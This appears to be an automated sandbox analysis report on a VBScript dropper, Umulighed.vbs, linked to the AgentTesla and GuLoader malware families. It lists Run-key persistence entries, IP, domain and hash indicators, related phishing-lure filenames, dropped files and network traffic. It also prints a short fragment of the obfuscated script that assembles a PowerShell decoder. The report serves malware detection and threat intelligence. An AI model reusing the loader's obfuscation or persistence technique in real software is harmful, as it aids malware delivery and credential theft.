                                                        Report type:full
                                                        Cookbook file name:default.jbs
                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:14
                                                        Number of new started drivers analysed:0
                                                        Number of existing processes analysed:0
                                                        Number of existing drivers analysed:0
                                                        Number of injected processes analysed:0
                                                        Technologies:
                                                        • HCA enabled
                                                        • EGA enabled
                                                        • AMSI enabled
                                                        Analysis Mode:default
                                                        Analysis stop reason:Timeout
                                                        Sample name:Umulighed.vbs
                                                        Detection:MAL
                                                        Classification:mal100.troj.spyw.expl.evad.winVBS@15/8@4/4
                                                        EGA Information:
                                                        • Successful, ratio: 50%
                                                        HCA Information:
                                                        • Successful, ratio: 99%
                                                        • Number of executed functions: 64
                                                        • Number of non-executed functions: 31
                                                        Cookbook Comments:
                                                        • Found application associated with file extension: .vbs
                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                        • Execution Graph export aborted for target powershell.exe, PID 6208 because it is empty
                                                        • Execution Graph export aborted for target powershell.exe, PID 6912 because it is empty
                                                        • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• Not all processes were analyzed; the report is missing behavior information
                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                        • Report size getting too big, too many NtCreateKey calls found.
                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                        • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                        • VT rate limit hit for: Umulighed.vbs
Time | Type | Description
09:12:32 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run newfile C:\Users\user\AppData\Roaming\newfile\newfile.exe
09:12:40 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run newfile C:\Users\user\AppData\Roaming\newfile\newfile.exe
10:11:57 | API Interceptor | 5064x Sleep call for process: powershell.exe modified
10:12:32 | API Interceptor | 113x Sleep call for process: wab.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
208.95.112.1 | Dhl Express Shipping Docs .pdf.exe | malicious | AgentTesla | ip-api.com/line/?fields=hosting
208.95.112.1 | r)_78768.exe | malicious | AgentTesla | ip-api.com/line/?fields=hosting
208.95.112.1 | e-dekont.exe | malicious | AgentTesla | ip-api.com/line/?fields=hosting
208.95.112.1 | DAIKIN AC SPAIN 2024.vbs | malicious | AgentTesla, GuLoader | ip-api.com/line/?fields=hosting
208.95.112.1 | transferencia.vbs | malicious | AgentTesla, GuLoader | ip-api.com/line/?fields=hosting
208.95.112.1 | Zapytanie ofertowe (7427-23 ROCKFIN).vbs | malicious | AgentTesla, GuLoader | ip-api.com/line/?fields=hosting
208.95.112.1 | orden de compra.vbs | malicious | AgentTesla | ip-api.com/line/?fields=hosting
208.95.112.1 | G4-TODOS.vbs | malicious | AgentTesla, GuLoader | ip-api.com/line/?fields=hosting
208.95.112.1 | RICHIESTA-QUOTAZIONI.jar | malicious | STRRAT | ip-api.com/json/
208.95.112.1 | explorer.exe | malicious | RedLine, XWorm | ip-api.com/line/?fields=hosting
114.142.162.17 | http://otahuhumainstreet.co.nz | malicious | Unknown | otahuhumainstreet.co.nz/
Match | Associated Sample Name / URL | Detection | Threat Name | Context
ip-api.com | Dhl Express Shipping Docs .pdf.exe | malicious | AgentTesla | 208.95.112.1
ip-api.com | r)_78768.exe | malicious | AgentTesla | 208.95.112.1
ip-api.com | e-dekont.exe | malicious | AgentTesla | 208.95.112.1
ip-api.com | DAIKIN AC SPAIN 2024.vbs | malicious | AgentTesla, GuLoader | 208.95.112.1
ip-api.com | transferencia.vbs | malicious | AgentTesla, GuLoader | 208.95.112.1
ip-api.com | Zapytanie ofertowe (7427-23 ROCKFIN).vbs | malicious | AgentTesla, GuLoader | 208.95.112.1
ip-api.com | orden de compra.vbs | malicious | AgentTesla | 208.95.112.1
ip-api.com | G4-TODOS.vbs | malicious | AgentTesla, GuLoader | 208.95.112.1
ip-api.com | RICHIESTA-QUOTAZIONI.jar | malicious | STRRAT | 208.95.112.1
ip-api.com | explorer.exe | malicious | RedLine, XWorm | 208.95.112.1
mail.cash4cars.nz | transferencia.vbs | malicious | AgentTesla, GuLoader | 114.142.162.17
mail.cash4cars.nz | Zapytanie ofertowe (7427-23 ROCKFIN).vbs | malicious | AgentTesla, GuLoader | 114.142.162.17
mail.cash4cars.nz | Factura240413227178.vbs | malicious | AgentTesla, GuLoader | 114.142.162.17
mail.cash4cars.nz | DHL Shipping doc.vbs | malicious | AgentTesla, GuLoader | 114.142.162.17
mail.cash4cars.nz | G4-TODOS.vbs | malicious | AgentTesla, GuLoader | 114.142.162.17
mail.cash4cars.nz | Gestión Pago a Proveedores - Liquidación anticipo.hta | malicious | AgentTesla, GuLoader | 114.142.162.17
mail.cash4cars.nz | rPayment_AdviceJ001222042024.bat | malicious | AgentTesla, GuLoader | 114.142.162.17
mail.cash4cars.nz | charesworh.exe | malicious | AgentTesla | 114.142.162.17
mail.cash4cars.nz | FAR.N°2430-24000993.exe | malicious | AgentTesla | 114.142.162.17
mail.cash4cars.nz | tems.exe | malicious | AgentTesla | 114.142.162.17
Match | Associated Sample Name / URL | Detection | Threat Name | Context
SERVERMULE-AS-AP Nimbus2 Pty Ltd AU | transferencia.vbs | malicious | AgentTesla, GuLoader | 114.142.162.17
SERVERMULE-AS-AP Nimbus2 Pty Ltd AU | Zapytanie ofertowe (7427-23 ROCKFIN).vbs | malicious | AgentTesla, GuLoader | 114.142.162.17
SERVERMULE-AS-AP Nimbus2 Pty Ltd AU | Factura240413227178.vbs | malicious | AgentTesla, GuLoader | 114.142.162.17
SERVERMULE-AS-AP Nimbus2 Pty Ltd AU | DHL Shipping doc.vbs | malicious | AgentTesla, GuLoader | 114.142.162.17
SERVERMULE-AS-AP Nimbus2 Pty Ltd AU | G4-TODOS.vbs | malicious | AgentTesla, GuLoader | 114.142.162.17
SERVERMULE-AS-AP Nimbus2 Pty Ltd AU | Gestión Pago a Proveedores - Liquidación anticipo.hta | malicious | AgentTesla, GuLoader | 114.142.162.17
SERVERMULE-AS-AP Nimbus2 Pty Ltd AU | rPayment_AdviceJ001222042024.bat | malicious | AgentTesla, GuLoader | 114.142.162.17
SERVERMULE-AS-AP Nimbus2 Pty Ltd AU | charesworh.exe | malicious | AgentTesla | 114.142.162.17
SERVERMULE-AS-AP Nimbus2 Pty Ltd AU | FAR.N°2430-24000993.exe | malicious | AgentTesla | 114.142.162.17
SERVERMULE-AS-AP Nimbus2 Pty Ltd AU | tems.exe | malicious | AgentTesla | 114.142.162.17
TUT-AS US | Dhl Express Shipping Docs .pdf.exe | malicious | AgentTesla | 208.95.112.1
TUT-AS US | r)_78768.exe | malicious | AgentTesla | 208.95.112.1
TUT-AS US | e-dekont.exe | malicious | AgentTesla | 208.95.112.1
TUT-AS US | DAIKIN AC SPAIN 2024.vbs | malicious | AgentTesla, GuLoader | 208.95.112.1
TUT-AS US | transferencia.vbs | malicious | AgentTesla, GuLoader | 208.95.112.1
TUT-AS US | Zapytanie ofertowe (7427-23 ROCKFIN).vbs | malicious | AgentTesla, GuLoader | 208.95.112.1
TUT-AS US | orden de compra.vbs | malicious | AgentTesla | 208.95.112.1
TUT-AS US | G4-TODOS.vbs | malicious | AgentTesla, GuLoader | 208.95.112.1
TUT-AS US | RICHIESTA-QUOTAZIONI.jar | malicious | STRRAT | 208.95.112.1
TUT-AS US | explorer.exe | malicious | RedLine, XWorm | 208.95.112.1
Match | Associated Sample Name / URL | Detection | Threat Name | Context
3b5074b1b5d032e5620f69f9f700ff0e | load_startup.txt.ps1 | malicious | Unknown | 142.251.2.132, 142.251.2.101
3b5074b1b5d032e5620f69f9f700ff0e | M_F+niestandardowy stempel.xlsx.exe | malicious | AgentTesla | 142.251.2.132, 142.251.2.101
3b5074b1b5d032e5620f69f9f700ff0e | https://u44056869.ct.sendgrid.net/ls/click?upn=u001.nH1ryR-2Btr2av-2Bkfc8quLEXKlGRKFonctFf3nB-2FAP-2Bjae3IsQgCoKtK-2FQ57cEEmmhZzRyd07G16kQ6rsc4EaJT6S7Rh48kOVsBPHV-2Fkkk9Vfz7cojLOCLuj4sUGVMM7pbdmwtinmtiLhfYkhEkgve628OiJsccHyeYc3lkmkn6epsOmmj4-2Fi-2BWjxfm73m7vUzCOGnDWnQJBmmd6DmkDcfIw-3D-3DU_vL_MRfqZW9nS4IDBSHT8MfJfSAq9b0aOVvtJoUhpW1Ga8ePAnfV-2FfXwE0xIGnayeXag21qNKRc5VLcgMkPlIuCBf7Hi8EFUvj1-2FlklJpMLZNx1IQq8eO26tVdmeuxhGn-2B2zjA71oEkiC9pTrxX9Dz-2FMJk8mkJr62ye1KlBo-2B8fxBlVl-2B6T0POpB0GKoibGhcjh4Z-2FnPU453nMAkUkNy65MlaA-3D-3D | malicious | HTMLPhisher | 142.251.2.132, 142.251.2.101
3b5074b1b5d032e5620f69f9f700ff0e | FİYAT TEKLİF.exe | malicious | AgentTesla, PureLog Stealer, RedLine | 142.251.2.132, 142.251.2.101
3b5074b1b5d032e5620f69f9f700ff0e | New DHL Shipment Document Arrival Notice.pdf.exe | malicious | AgentTesla | 142.251.2.132, 142.251.2.101
3b5074b1b5d032e5620f69f9f700ff0e | hesaphareketi_1.scr.exe | malicious | AgentTesla | 142.251.2.132, 142.251.2.101
3b5074b1b5d032e5620f69f9f700ff0e | e-dekont.exe | malicious | AgentTesla | 142.251.2.132, 142.251.2.101
3b5074b1b5d032e5620f69f9f700ff0e | e-dekont.exe | malicious | Snake Keylogger | 142.251.2.132, 142.251.2.101
3b5074b1b5d032e5620f69f9f700ff0e | DAIKIN AC SPAIN 2024.vbs | malicious | AgentTesla, GuLoader | 142.251.2.132, 142.251.2.101
3b5074b1b5d032e5620f69f9f700ff0e | transferencia.vbs | malicious | AgentTesla, GuLoader | 142.251.2.132, 142.251.2.101
37f463bf4616ecd445d4a1937da06e19 | rq0mVjR9ar.exe | malicious | Babuk, Clipboard Hijacker, Djvu, Vidar | 142.251.2.132, 142.251.2.101
37f463bf4616ecd445d4a1937da06e19 | responsibilityleadpro.exe | malicious | CredGrabber, Meduza Stealer | 142.251.2.132, 142.251.2.101
37f463bf4616ecd445d4a1937da06e19 | 8jvTeVxooN.exe | malicious | Babuk, Djvu, Vidar | 142.251.2.132, 142.251.2.101
37f463bf4616ecd445d4a1937da06e19 | СПЦ №130 от 12.04.2024 подпис..exe | malicious | GuLoader, Remcos | 142.251.2.132, 142.251.2.101
37f463bf4616ecd445d4a1937da06e19 | DAIKIN AC SPAIN 2024.vbs | malicious | AgentTesla, GuLoader | 142.251.2.132, 142.251.2.101
37f463bf4616ecd445d4a1937da06e19 | transferencia.vbs | malicious | AgentTesla, GuLoader | 142.251.2.132, 142.251.2.101
37f463bf4616ecd445d4a1937da06e19 | 1000901 LIQUIDACION.vbs | malicious | FormBook, GuLoader | 142.251.2.132, 142.251.2.101
37f463bf4616ecd445d4a1937da06e19 | Zapytanie ofertowe (7427-23 ROCKFIN).vbs | malicious | AgentTesla, GuLoader | 142.251.2.132, 142.251.2.101
37f463bf4616ecd445d4a1937da06e19 | Factura240413227178.vbs | malicious | AgentTesla, GuLoader | 142.251.2.132, 142.251.2.101
37f463bf4616ecd445d4a1937da06e19 | Price request N°DEM23000199.js | malicious | AsyncRAT, PureLog Stealer, RedLine | 142.251.2.132, 142.251.2.101
Match | Associated Sample Name / URL | Detection | Threat Name
C:\Users\user\AppData\Roaming\newfile\newfile.exe | DAIKIN AC SPAIN 2024.vbs | malicious | AgentTesla, GuLoader
C:\Users\user\AppData\Roaming\newfile\newfile.exe | transferencia.vbs | malicious | AgentTesla, GuLoader
C:\Users\user\AppData\Roaming\newfile\newfile.exe | Zapytanie ofertowe (7427-23 ROCKFIN).vbs | malicious | AgentTesla, GuLoader
C:\Users\user\AppData\Roaming\newfile\newfile.exe | G4-TODOS.vbs | malicious | AgentTesla, GuLoader
C:\Users\user\AppData\Roaming\newfile\newfile.exe | Gestión Pago a Proveedores - Liquidación anticipo.hta | malicious | AgentTesla, GuLoader
C:\Users\user\AppData\Roaming\newfile\newfile.exe | rPayment_AdviceJ001222042024.bat | malicious | AgentTesla, GuLoader
C:\Users\user\AppData\Roaming\newfile\newfile.exe | Copy of Poseidon Marine 4th monthly Stores Apr 2024 R3 .xls.vbs | malicious | AgentTesla, GuLoader
C:\Users\user\AppData\Roaming\newfile\newfile.exe | Request for Proposal Quote_2414976·pdf.vbs | malicious | GuLoader, Lokibot
C:\Users\user\AppData\Roaming\newfile\newfile.exe | Documentos adjuntos.vbe | malicious | AgentTesla, GuLoader
C:\Users\user\AppData\Roaming\newfile\newfile.exe | 20220829_PEDIDO_22073M_PROTECO_LIMPIEZA_Y_KITS.vbe | malicious | AgentTesla, GuLoader
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:data
                                                                            Category:modified
                                                                            Size (bytes):11608
                                                                            Entropy (8bit):4.886255615007755
                                                                            Encrypted:false
                                                                            SSDEEP:192:Pxoe5lpOdxoe56ib49Vsm5emdiVFn3eGOVpN6K3bkkjo5agkjDt4iWN3yBGHB9sT:lVib49+VoGIpN6KQkj2xkjh4iUx4cYK6
                                                                            MD5:C7F7A26360E678A83AFAB85054B538EA
                                                                            SHA1:B9C885922370EE7573E7C8CF0DDB8D97B7F6F022
                                                                            SHA-256:C3D527BCA7A1D1A398F5BE0C70237BD69281601DFD7D1ED6D389B2FD8E3BC713
                                                                            SHA-512:9F2F9DA5F4BF202A08BADCD4EF9CE159269EF47B657C6F67DC3C9FDB4EE0005CE5D0A9B4218DB383BAD53222B728B77B591CB5F41781AB30EF145CC7DB7D4F77
                                                                            Malicious:false
                                                                            Reputation:moderate, very likely benign file
                                                                            Preview:PSMODULECACHE......e..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.............z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):64
                                                                            Entropy (8bit):1.1940658735648508
                                                                            Encrypted:false
                                                                            SSDEEP:3:Nlllul/nq/llh:NllUyt
                                                                            MD5:AB80AD9A08E5B16132325DF5584B2CBE
                                                                            SHA1:F7411B7A5826EE6B139EBF40A7BEE999320EF923
                                                                            SHA-256:5FBE5D71CECADD2A3D66721019E68DD78C755AA39991A629AE81C77B531733A4
                                                                            SHA-512:9DE2FB33C0EA36E1E174850AD894659D6B842CD624C1A543B2D391C8EBC74719F47FA88D0C4493EA820611260364C979C9CDF16AF1C517132332423CA0CB7654
                                                                            Malicious:false
                                                                            Preview:@...e................................................@..........
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):60
                                                                            Entropy (8bit):4.038920595031593
                                                                            Encrypted:false
                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                            Malicious:false
                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):60
                                                                            Entropy (8bit):4.038920595031593
                                                                            Encrypted:false
                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                            Malicious:false
                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):60
                                                                            Entropy (8bit):4.038920595031593
                                                                            Encrypted:false
                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                            Malicious:false
                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):60
                                                                            Entropy (8bit):4.038920595031593
                                                                            Encrypted:false
                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                            Malicious:false
                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):500988
                                                                            Entropy (8bit):5.9507784897943035
                                                                            Encrypted:false
                                                                            SSDEEP:6144:6jYnEf6zRdygMSLtIr00cxh5uUuKL6DscbBxSfBleJCxPCXHAV5TgDp2ILM:6UEfMdyktIr0hv+KLCBbBIlewPCiUUIo
                                                                            MD5:E776173D5EC38DBAB15C13C2FDBA9675
                                                                            SHA1:2FCDE3121765EA5BCE929C1B93E2CF341B0790B6
                                                                            SHA-256:2884060CE4900B4D65002A8F8E5A7B1839EC9701A8FF3242BAC0D5F307648958
                                                                            SHA-512:89AAF5C9EC69ECE51FC7B2CD48B8323F26D3BBB230A891ADC3923884633EB0B409C1E5F6E9A070044058F0F7E4DCAC3AA246B3017A3DF0BD7BE9ADF3BA94A982
                                                                            Malicious:false
                                                                            Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):516608
                                                                            Entropy (8bit):6.035530871194082
                                                                            Encrypted:false
                                                                            SSDEEP:12288:TTx5KRZ18xtSP+szdcIugOO50MMEMOkP:QmxtSP+sJ+O5FWPP
                                                                            MD5:251E51E2FEDCE8BB82763D39D631EF89
                                                                            SHA1:677A3566789D4DA5459A1ECD01A297C261A133A2
                                                                            SHA-256:2682086ACE1970D5573F971669591B731F87D749406927BD7A7A4B58C3C662E9
                                                                            SHA-512:3B49E6D9197B12CA7AA282707D62496D9FEAC32B3F6FD15AFFD4EAAA5239DA903FADD4600A1D17A45EC330A590FC86218C9A7DC20306B52D8170E04B0E325521
                                                                            Malicious:false
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                            Joe Sandbox View:
                                                                            • Filename: DAIKIN AC SPAIN 2024.vbs, Detection: malicious
                                                                            • Filename: transferencia.vbs, Detection: malicious
                                                                            • Filename: Zapytanie ofertowe (7427-23 ROCKFIN).vbs, Detection: malicious
                                                                            • Filename: G4-TODOS.vbs, Detection: malicious
                                                                            • Filename: Gestión Pago a Proveedores - Liquidación anticipo.hta, Detection: malicious
                                                                            • Filename: rPayment_AdviceJ001222042024.bat, Detection: malicious
                                                                            • Filename: Copy of Poseidon Marine 4th monthly Stores Apr 2024 R3 .xls.vbs, Detection: malicious
                                                                            • Filename: Request for Proposal Quote_2414976·pdf.vbs, Detection: malicious
                                                                            • Filename: Documentos adjuntos.vbe, Detection: malicious
                                                                            • Filename: 20220829_PEDIDO_22073M_PROTECO_LIMPIEZA_Y_KITS.vbe, Detection: malicious
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................
                                                                            File type:ASCII text, with very long lines (359), with CRLF line terminators
                                                                            Entropy (8bit):5.390157238510706
                                                                            TrID:
                                                                            • Visual Basic Script (13500/0) 100.00%
                                                                            File name:Umulighed.vbs
                                                                            File size:8'147 bytes
                                                                            MD5:7a879857b435057c4825e33b280baa15
                                                                            SHA1:d79ea735b0440d929bb6b046974e03915cb8bfd8
                                                                            SHA256:d15c94ea77716eb5071b879c630b22509e0cee099bb7f9d3f823b8fb57f77d6d
                                                                            SHA512:ce99bb30f9ec43e74e6cf4ad7bd53759f94c895670662cf796d5bb84dd041da52e3012f5251f3a23ef13be1c1f3a51bb67b65825d24f544eaf79626f29dc77c8
                                                                            SSDEEP:96:qpAwOjfFFxwSH5YMsAFCVONt/cpxFSQ3nTQG0Q/WFRtBHXNFmkOtvZ6XV5qRAswT:qp1OjhH5lBg4UpxM5yKpHuBOVcAh+29P
                                                                            TLSH:8AF13B1D11663CAF13BE0E647792089FD9A92E3DD542EC507259C5C1265E6B82A3F88C
                                                                            File Content Preview:.. ..Function Sodavander ......D8 = D8 & "$Unbumped = 1;$Svveflyvers='Substrin';$Svveflyvers+='g';Function Disken($Sthamrenes){$Hotelvrelserne=$Sthamrenes.Length-$Unbumped;For($Acned=5; $Acned -lt $Hotelvrelserne; $Acned+=(6)){$Professorships+=$Sthamrenes
                                                                            Icon Hash:68d69b8f86ab9a86
Timestamp                             Source Port  Dest Port  Source IP      Dest IP
Apr 24, 2024 10:11:59.088108063 CEST  49730        443        192.168.2.4    142.251.2.101
Apr 24, 2024 10:11:59.088141918 CEST  443          49730      142.251.2.101  192.168.2.4
Apr 24, 2024 10:11:59.088243008 CEST  49730        443        192.168.2.4    142.251.2.101
Apr 24, 2024 10:11:59.098905087 CEST  49730        443        192.168.2.4    142.251.2.101
Apr 24, 2024 10:11:59.098922968 CEST  443          49730      142.251.2.101  192.168.2.4
Apr 24, 2024 10:11:59.466784954 CEST  443          49730      142.251.2.101  192.168.2.4
Apr 24, 2024 10:11:59.466873884 CEST  49730        443        192.168.2.4    142.251.2.101
Apr 24, 2024 10:11:59.467922926 CEST  443          49730      142.251.2.101  192.168.2.4
Apr 24, 2024 10:11:59.467995882 CEST  49730        443        192.168.2.4    142.251.2.101
Apr 24, 2024 10:11:59.471906900 CEST  49730        443        192.168.2.4    142.251.2.101
Apr 24, 2024 10:11:59.471915960 CEST  443          49730      142.251.2.101  192.168.2.4
Apr 24, 2024 10:11:59.472246885 CEST  443          49730      142.251.2.101  192.168.2.4
Apr 24, 2024 10:11:59.483926058 CEST  49730        443        192.168.2.4    142.251.2.101
Apr 24, 2024 10:11:59.528115034 CEST  443          49730      142.251.2.101  192.168.2.4
Apr 24, 2024 10:11:59.867569923 CEST  443          49730      142.251.2.101  192.168.2.4
Apr 24, 2024 10:11:59.867666960 CEST  49730        443        192.168.2.4    142.251.2.101
Apr 24, 2024 10:11:59.867691040 CEST  443          49730      142.251.2.101  192.168.2.4
Apr 24, 2024 10:11:59.867703915 CEST  443          49730      142.251.2.101  192.168.2.4
Apr 24, 2024 10:11:59.867753983 CEST  49730        443        192.168.2.4    142.251.2.101
Apr 24, 2024 10:11:59.870172977 CEST  49730        443        192.168.2.4    142.251.2.101
Apr 24, 2024 10:12:00.051837921 CEST  49731        443        192.168.2.4    142.251.2.132
Apr 24, 2024 10:12:00.051887035 CEST  443          49731      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:00.051964998 CEST  49731        443        192.168.2.4    142.251.2.132
Apr 24, 2024 10:12:00.052350998 CEST  49731        443        192.168.2.4    142.251.2.132
Apr 24, 2024 10:12:00.052367926 CEST  443          49731      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:00.423805952 CEST  443          49731      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:00.423899889 CEST  49731        443        192.168.2.4    142.251.2.132
Apr 24, 2024 10:12:00.426632881 CEST  49731        443        192.168.2.4    142.251.2.132
Apr 24, 2024 10:12:00.426641941 CEST  443          49731      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:00.427047968 CEST  443          49731      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:00.428046942 CEST  49731        443        192.168.2.4    142.251.2.132
Apr 24, 2024 10:12:00.472119093 CEST  443          49731      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:01.321341991 CEST  443          49731      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:01.321537018 CEST  49731        443        192.168.2.4    142.251.2.132
Apr 24, 2024 10:12:01.333622932 CEST  443          49731      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:01.333885908 CEST  49731        443        192.168.2.4    142.251.2.132
Apr 24, 2024 10:12:01.358589888 CEST  443          49731      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:01.358897924 CEST  49731        443        192.168.2.4    142.251.2.132
Apr 24, 2024 10:12:01.371089935 CEST  443          49731      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:01.421494007 CEST  49731        443        192.168.2.4    142.251.2.132
Apr 24, 2024 10:12:01.421513081 CEST  443          49731      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:01.468400002 CEST  49731        443        192.168.2.4    142.251.2.132
Apr 24, 2024 10:12:01.497595072 CEST  443          49731      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:01.503177881 CEST  443          49731      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:01.503273010 CEST  443          49731      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:01.503356934 CEST  49731        443        192.168.2.4    142.251.2.132
Apr 24, 2024 10:12:01.503372908 CEST  443          49731      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:01.503420115 CEST  49731        443        192.168.2.4    142.251.2.132
Apr 24, 2024 10:12:01.515850067 CEST  443          49731      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:01.528525114 CEST  443          49731      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:01.528645039 CEST  443          49731      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:01.528723955 CEST  49731        443        192.168.2.4    142.251.2.132
Apr 24, 2024 10:12:01.528733969 CEST  443          49731      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:01.528860092 CEST  49731        443        192.168.2.4    142.251.2.132
Apr 24, 2024 10:12:01.541748047 CEST  443          49731      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:01.554228067 CEST  443          49731      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:01.554301023 CEST  49731        443        192.168.2.4    142.251.2.132
Apr 24, 2024 10:12:01.554313898 CEST  443          49731      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:01.566191912 CEST  443          49731      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:01.566253901 CEST  49731        443        192.168.2.4    142.251.2.132
Apr 24, 2024 10:12:01.566262007 CEST  443          49731      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:01.578620911 CEST  443          49731      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:01.578665972 CEST  443          49731      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:01.578778028 CEST  49731        443        192.168.2.4    142.251.2.132
Apr 24, 2024 10:12:01.578788042 CEST  443          49731      142.251.2.132  192.168.2.4
Apr 24, 2024 10:12:01.578840971 CEST  49731        443        192.168.2.4    142.251.2.132
